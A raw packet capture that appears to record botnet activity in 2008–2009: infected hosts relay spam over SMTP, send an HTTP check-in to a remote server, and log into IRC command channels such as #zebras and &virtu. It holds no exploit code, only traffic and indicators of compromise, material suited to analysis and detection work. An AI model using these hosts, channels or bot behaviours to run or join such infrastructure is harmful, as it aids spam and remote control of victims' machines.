2008-12-29 13:36:05.471411 IP 194.25.134.73.25 > 168.131.48.151.1443: Flags [P.], seq 209:240, ack 159, win 5840, length 31
E..G.:@.2.7….I..0……o_Qj.P8P…}…250 2.1.5 Recipient accepted.

2008-12-29 13:36:05.471615 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [P.], seq 217:248, ack 168, win 64073, length 31
E..G..@….J..0.B…’0…>……P..I….250 2.1.5 Recipient accepted.

2008-12-29 13:46:05.303000 IP 168.131.48.151.1840 > 89.149.227.194.80: Flags [P.], seq 1:176, ack 1, win 64240, length 175
E…..@…….0.Y….0.P……..P….x..GET /utest/?jutr=70224&oo=2&12e883=845b95&ra=3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 89.149.227.194
Cache-Control: no-cache

2008-12-29 13:46:05.608298 IP 89.149.227.194.80 > 168.131.48.151.1840: Flags [.], ack 176, win 6432, length 0
E..(.f@.3.m.Y…..0..P.0……..P.. .h……..
2008-12-29 13:46:05.609088 IP 89.149.227.194.41133 > 168.131.48.151.10032: Flags [S], seq 96089794, win 5840, options [mss 1460,sackOK,TS val 431625594 ecr 0,nop,wscale 6], length 0
E..<#.@.3...Y.....0...'0..6..........0......... ...z........
2008-12-29 13:46:05.609241 IP 168.131.48.151.10032 > 89.149.227.194.41133: Flags [S.], seq 2412816989, ack 96089795, win 64240, options [mss 1460,nop,wscale 0,nop,nop,TS val 0 ecr 0,nop,nop,sackOK], length 0
E..@..@….1..0.Y…’0…..]..6………………..
…………
2008-12-29 13:46:05.906305 IP 89.149.227.194.41133 > 168.131.48.151.10032: Flags [.], ack 1, win 92, options [nop,nop,TS val 431625668 ecr 0], length 0
E..4#.@.3…Y…..0…’0..6….^…\…….
……..
2008-12-29 13:46:05.906899 IP 89.149.227.194.41133 > 168.131.48.151.10032: Flags [F.], seq 1, ack 1, win 92, options [nop,nop,TS val 431625668 ecr 0], length 0
E..4#.@.3…Y…..0…’0..6….^…\…….
……..
2008-12-29 13:46:05.906904 IP 89.149.227.194.80 > 168.131.48.151.1840: Flags [P.], seq 1:190, ack 176, win 6432, length 189
E….g@.3.m9Y…..0..P.0……..P.. ….HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Mon, 29 Dec 2008 17:41:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.2.0-8+etch11

0

2008-12-29 13:46:05.906908 IP 89.149.227.194.80 > 168.131.48.151.1840: Flags [F.], seq 190, ack 176, win 6432, length 0
E..(.h@.3.m.Y…..0..P.0……..P.. ……….
2008-12-29 13:46:05.907059 IP 168.131.48.151.10032 > 89.149.227.194.41133: Flags [.], ack 2, win 64240, options [nop,nop,TS val 12345 ecr 431625668], length 0
E..4..@….<..0.Y...'0.....^..6............ ..09....
2008-12-29 13:46:05.907092 IP 168.131.48.151.1840 > 89.149.227.194.80: Flags [.], ack 191, win 64051, length 0
E..(..@….G..0.Y….0.P……..P..3….
2008-12-29 13:46:05.907203 IP 168.131.48.151.1840 > 89.149.227.194.80: Flags [F.], seq 176, ack 191, win 64051, length 0
E..(..@….F..0.Y….0.P……..P..3….
2008-12-29 13:46:05.907342 IP 168.131.48.151.10032 > 89.149.227.194.41133: Flags [F.], seq 1, ack 2, win 64240, options [nop,nop,TS val 12345 ecr 431625668], length 0
E..4..@….9..0.Y…’0…..^..6…………
..09….
2008-12-29 13:46:06.205332 IP 89.149.227.194.41133 > 168.131.48.151.10032: Flags [.], ack 2, win 92, options [nop,nop,TS val 431625743 ecr 12345], length 0
E..4..@.3.1RY…..0…’0..6…._…\.`…..
……09
2008-12-29 13:46:06.212714 IP 89.149.227.194.80 > 168.131.48.151.1840: Flags [.], ack 177, win 6432, length 0
E..(..@.3.1^Y…..0..P.0……..P.. ……….
2008-12-29 13:46:06.704522 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [P.], seq 1:59, ack 1, win 64240, length 58
E..b..@…….0.SD…”
.}.Q…PP…. ..USER linid linid linid :Administrator
NICK [LZ]fIoXWVdy

2008-12-29 13:46:08.979233 IP 168.131.48.89.53 > 168.131.48.151.1800: 35195 ServFail 0/0/0 (37)
E..A..@.@…..0Y..0..5…-a..{………..proxim ircgalaxy[.]pl…..
2008-12-29 13:46:08.979403 IP 168.131.48.151 > 168.131.48.89: ICMP 168.131.48.151 udp port 1800 unreachable, length 73
E..].+….n~..0…0Y…2….E..A..@.@…..0Y..0..5…-a..{………..proxim ircgalaxy[.]pl…..
2008-12-29 13:46:11.006840 IP 168.131.48.151.1842 > 168.131.48.89.53: 11627+ A? proxim.ircgalaxy[.]pl. (37)
E..A.,….n…0…0Y.2.5.->J-k………..proxim ircgalaxy[.]pl…..
2008-12-29 13:46:11.202529 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [S.], seq 2983467599, ack 2591924817, win 5840, options [mss 1460,nop,nop,sackOK], length 0
E..0..@.4.
dSD….0.
.”…O.}.Qp……………
2008-12-29 13:46:11.202667 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [.], ack 1, win 64240, length 0
E..(.-@….>..0.SD…”
.}…..PP…^&..
2008-12-29 13:46:12.004231 IP 168.131.48.151.1842 > 210.220.163.82.53: 11627+ A? proxim.ircgalaxy[.]pl. (37)
E..A.4……..0….R.2.5.-..-k………..proxim ircgalaxy[.]pl…..
2008-12-29 13:46:12.011748 IP 210.220.163.82.53 > 168.131.48.151.1842: 11627* 1/0/0 A 127.0.0.1 (53)
E..Q..@……..R..0..5.2.=..-k………..proxim ircgalaxy[.]pl………….Q…….
2008-12-29 13:46:18.746386 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [P.], seq 1:59, ack 1, win 64240, length 58
E..b.?@…….0.SD…”
.}.Q…PP…. ..USER linid linid linid :Administrator
NICK [LZ]fIoXWVdy

2008-12-29 13:46:42.675254 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [P.], seq 1:59, ack 1, win 64240, length 58
E..b.v……..0.SD…”
.}.Q…PP…. ..USER linid linid linid :Administrator
NICK [LZ]fIoXWVdy

2008-12-29 13:46:43.040734 IP 168.131.48.151.1846 > 168.131.48.89.53: 58030+ A? proxim.ircgalaxy[.]pl. (37)
E..A.w….n>..0…0Y.6.5.-……………proxim ircgalaxy[.]pl…..
2008-12-29 13:46:44.036505 IP 168.131.48.151.1846 > 210.220.163.82.53: 58030+ A? proxim.ircgalaxy[.]pl. (37)
E..A.x……..0….R.6.5.-……………proxim ircgalaxy[.]pl…..
2008-12-29 13:46:44.043433 IP 210.220.163.82.53 > 168.131.48.151.1846: 58030* 1/0/0 A 127.0.0.1 (53)
E..Q!.@….$…R..0..5.6.=.}………….proxim ircgalaxy[.]pl………….Q…….
2008-12-29 13:46:47.409584 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [S.], seq 2983467599, ack 2591924817, win 5840, options [mss 1460,nop,nop,sackOK], length 0
E..0..@.4.
dSD….0.
.”…O.}.Qp……………
2008-12-29 13:46:47.409750 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [.], ack 1, win 64240, length 0
E..(……….0.SD…”
.}…..PP…^&..
2008-12-29 13:46:49.354801 IP 168.131.48.151.1159 > 143.215.15.205.80: Flags [.], seq 1:2, ack 1, win 64240, length 1
E..)..@…g…0……..P..gj….P….G..G
2008-12-29 13:46:49.569068 IP 143.215.15.205.80 > 168.131.48.151.1159: Flags [.], ack 1, win 0, length 0
E..(..@………..0..P……..gjP….9……..
2008-12-29 13:46:51.935360 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [P.], seq 1:113, ack 1, win 5840, length 112
E…..@.4.4.SD….0.
."...P.}.QP.......NOTICE AUTH :*** Looking up your hostname...
NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No Ident response

2008-12-29 13:46:52.092124 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [.], ack 113, win 64128, length 0
E..(……….0.SD…”
.}……P…^&..
2008-12-29 13:47:06.745488 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [P.], seq 1:59, ack 113, win 64128, length 58
E..b……….0.SD…”
.}.Q….P…. ..USER linid linid linid :Administrator
NICK [LZ]fIoXWVdy

2008-12-29 13:47:07.113562 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [.], ack 59, win 5840, length 0
E..(..@.4.4pSD….0.
.”…..}..P…A………
2008-12-29 13:47:07.150572 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [P.], seq 113:1113, ack 59, win 5840, length 1000
E…..@.4.0.SD….0.
.”…..}..P…#2..:norks.org 001 [LZ]fIoXWVdy :Welcome to the Internet Relay Network [LZ]fIoXWVdy
:norks.org 002 [LZ]fIoXWVdy :Your host is localhost, running version 2.9/hybrid-6.3
NOTICE [LZ]fIoXWVdy :*** Your host is localhost, running version 2.9/hybrid-6.3
:norks.org 003 [LZ]fIoXWVdy :This server was created Thu Dec 6 2001 at 11:52:49 GMT
:norks.org 004 [LZ]fIoXWVdy norks.org 2.8/hybrid-6.2 oOiwszcrkfydnxb biklmnopstve
:norks.org 251 [LZ]fIoXWVdy :There are 2 users and 0 invisible on 1 servers
:norks.org 255 [LZ]fIoXWVdy :I have 2 clients and 0 servers
:norks.org 265 [LZ]fIoXWVdy :Current local users: 2 Max: 2
:norks.org 266 [LZ]fIoXWVdy :Current global users: 2 Max: 2
:norks.org 250 [LZ]fIoXWVdy :Highest connection count: 2 (2 clients) (2 since server was (re)started)
:norks.org 375 [LZ]fIoXWVdy :- norks.org Message of the Day -
:norks.org 372 [LZ]fIoXWVdy :- Where's the kaboom? There was supposed to be an earth shattering kaboom.
:norks.org 376 [LZ]fIoXWVdy :End of /MOTD command.

2008-12-29 13:47:07.151007 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [P.], seq 59:82, ack 1113, win 64240, length 23
E..?……….0.SD…”
.}……P….-..MODE [LZ]fIoXWVdy +xi

2008-12-29 13:47:07.559193 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [.], ack 82, win 5840, length 0
E..(..@.4.4nSD….0.
.”…..}..P…=………
2008-12-29 13:47:07.559352 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [P.], seq 82:97, ack 1113, win 64240, length 15
E..7……….0.SD…”
.}……P…=…JOIN #zebras

2008-12-29 13:47:08.343018 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [P.], seq 1163:1453, ack 118, win 5840, length 290
E..J..@.4.3ISD….0.
.”…..}..P…….:norks.org MODE #zebras +nt
:norks.org 353 [LZ]fIoXWVdy = #zebras :@wloos [LZ]fIoXWVdy
:norks.org 366 [LZ]fIoXWVdy #zebras :End of /NAMES list.
:norks.org 332 [LZ]fIoXWVdy #zebras :
:norks.org 333 [LZ]fIoXWVdy #zebras [LZ]fIoXWVdy 1230572831
:wloos!~wloos@norks.org PRIVMSG #zebras :

2008-12-29 13:47:08.497394 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [.], ack 1453, win 63900, length 0
E..(……….0.SD…”
.}……P…Y…
2008-12-29 13:47:08.863647 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [P.], seq 1453:1556, ack 118, win 5840, length 103
E…..@.4.4.SD….0.
.”…..}..P…….:norks.org 324 [LZ]fIoXWVdy #zebras +smntu +tn
:norks.org 329 [LZ]fIoXWVdy #zebras +smntu 1230572831

2008-12-29 13:47:09.044260 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [.], ack 1556, win 63797, length 0
E..(……….0.SD…”
.}…. cP..5Y…
2008-12-29 13:47:13.043800 IP 168.131.48.89.53 > 168.131.48.151.1846: 58030 ServFail 0/0/0 (37)
E..A..@.@…..0Y..0..5.6.-……………proxim ircgalaxy[.]pl…..
2008-12-29 13:47:13.043968 IP 168.131.48.151 > 168.131.48.89: ICMP 168.131.48.151 udp port 1846 unreachable, length 73
E..]……m…0…0Y…2….E..A..@.@…..0Y..0..5.6.-……………proxim ircgalaxy[.]pl…..
2008-12-29 13:47:14.956391 IP 168.131.48.151.1074 > 143.215.15.145.80: Flags [.], seq 1:2, ack 1, win 64240, length 1
E..)..@…g_..0……2.P..]….1P….c..G
2008-12-29 13:47:15.099995 IP 168.131.48.151.1855 > 168.131.48.89.53: 12509+ A? proxim.ircgalaxy[.]pl. (37)
E..A……m…0…0Y.?.5.-:.0…………proxim ircgalaxy[.]pl…..
2008-12-29 13:47:15.172497 IP 143.215.15.145.80 > 168.131.48.151.1074: Flags [.], ack 1, win 0, length 0
E..(..@….M……0..P.2…1..].P…IU……..
2008-12-29 13:47:16.099072 IP 168.131.48.151.1855 > 210.220.163.82.53: 12509+ A? proxim.ircgalaxy[.]pl. (37)
E..A…….s..0….R.?.5.-.x0…………proxim ircgalaxy[.]pl…..
2008-12-29 13:47:16.106517 IP 210.220.163.82.53 > 168.131.48.151.1855: 12509* 1/0/0 A 127.0.0.1 (53)
E..Q..@……..R..0..5.?.=.F0…………proxim ircgalaxy[.]pl………….Q…….
2008-12-29 13:47:19.406661 IP 217.171.192.14.18664 > 168.131.48.151.113: Flags [S], seq 1518191487, win 5840, options [mss 1364,sackOK,TS val 197012450 ecr 0,nop,wscale 0], length 0
E..<..@.+..)......0.H..qZ}.................T... ..+.........
2008-12-29 13:47:19.406851 IP 168.131.48.151.113 > 217.171.192.14.18664: Flags [S.], seq 3782440357, ack 1518191488, win 64240, options [mss 1460,nop,wscale 0,nop,nop,TS val 0 ecr 0,nop,nop,sackOK], length 0
E..@..@…l…0……qH..su.Z}…… …………..
…………
2008-12-29 13:47:19.729875 IP 217.171.192.14.18664 > 168.131.48.151.113: Flags [.], ack 1, win 5840, options [nop,nop,TS val 197012774 ecr 0], length 0
E..4[.@.+..J……0.H..qZ}…su…………
..-&….
2008-12-29 13:47:19.729883 IP 217.171.192.14.18664 > 168.131.48.151.113: Flags [P.], seq 1:12, ack 1, win 5840, options [nop,nop,TS val 197012774 ecr 0], length 11
E..?n.@.+.nT……0.H..qZ}…su…………
..-&….1857 , 25

2008-12-29 13:47:19.730232 IP 168.131.48.151.113 > 217.171.192.14.18664: Flags [P.], seq 1:39, ack 12, win 64229, options [nop,nop,TS val 13084 ecr 197012774], length 38
E..Z..@…l…0……qH..su.Z}……pY…..
..3…-&1857 , 25
: USERID : UNIX : linid
2008-12-29 13:48:29.119814 IP 168.131.48.151.10032 > 66.235.184.220.3441: Flags [P.], seq 9:537, ack 10, win 64231, length 528
E..8.:@…….0.B…’0.q……T.P…….220-mail.austrogate.net ESMTP IceWarp 9.4.0; Mon, 29 Dec 2008 18:48:47 +0100
220-*********************************************************************
220-* Secure Mail Server *
220-* *
220-* All connections are logged! *
220-* This server employs anti-virus and anti-spam technology *
220 *********************************************************************

2008-12-29 13:48:29.378474 IP 66.235.184.220.3441 > 168.131.48.151.10032: Flags [P.], seq 10:29, ack 537, win 64999, length 19
E..;).@.n…B…..0..q’0..T…..P…….HELO politico[.]com

2008-12-29 13:48:29.541457 IP 168.131.48.151.10032 > 66.235.184.220.3441: Flags [.], ack 29, win 64212, length 0
E..(.=@… …0.B…’0.q……T.P…….
2008-12-29 13:48:29.707397 IP 168.131.48.151.10032 > 66.235.184.220.3441: Flags [P.], seq 537:620, ack 29, win 64212, length 83
E..{.>@… ]..0.B…’0.q……T.P…….250 mail.austrogate.net Hello politico[.]com [80.190.246.218], pleased to meet you.

2008-12-29 13:48:30.025500 IP 66.235.184.220.3441 > 168.131.48.151.10032: Flags [P.], seq 29:65, ack 620, win 64916, length 36
E..L/.@.n…B…..0..q’0..T…..P…….MAIL FROM:
2009-06-04 15:09:58.223734 IP 121.12.116.142.65520 > 168.131.48.242.1026: Flags [P.], seq 944:954, ack 1930, win 65535, length 10
E..2..@./…y.t…0…..p…….P…….PING :m.

2009-06-04 15:09:58.224345 IP 168.131.48.242.1026 > 121.12.116.142.65520: Flags [P.], seq 1930:1939, ack 954, win 64582, length 9
E..1..@…….0.y.t………p…P..F….PONG :m.
2009-06-04 15:09:58.415594 IP 121.12.116.142.65520 > 168.131.48.242.1026: Flags [.], ack 1939, win 65535, length 0
E..(..@./…y.t…0…..p…….P…E………
2009-06-04 15:09:58.415772 IP 168.131.48.242.1026 > 121.12.116.142.65520: Flags [P.], seq 1939:1951, ack 954, win 64582, length 12
E..4..@…….0.y.t………p…P..F7…JOIN &virtu
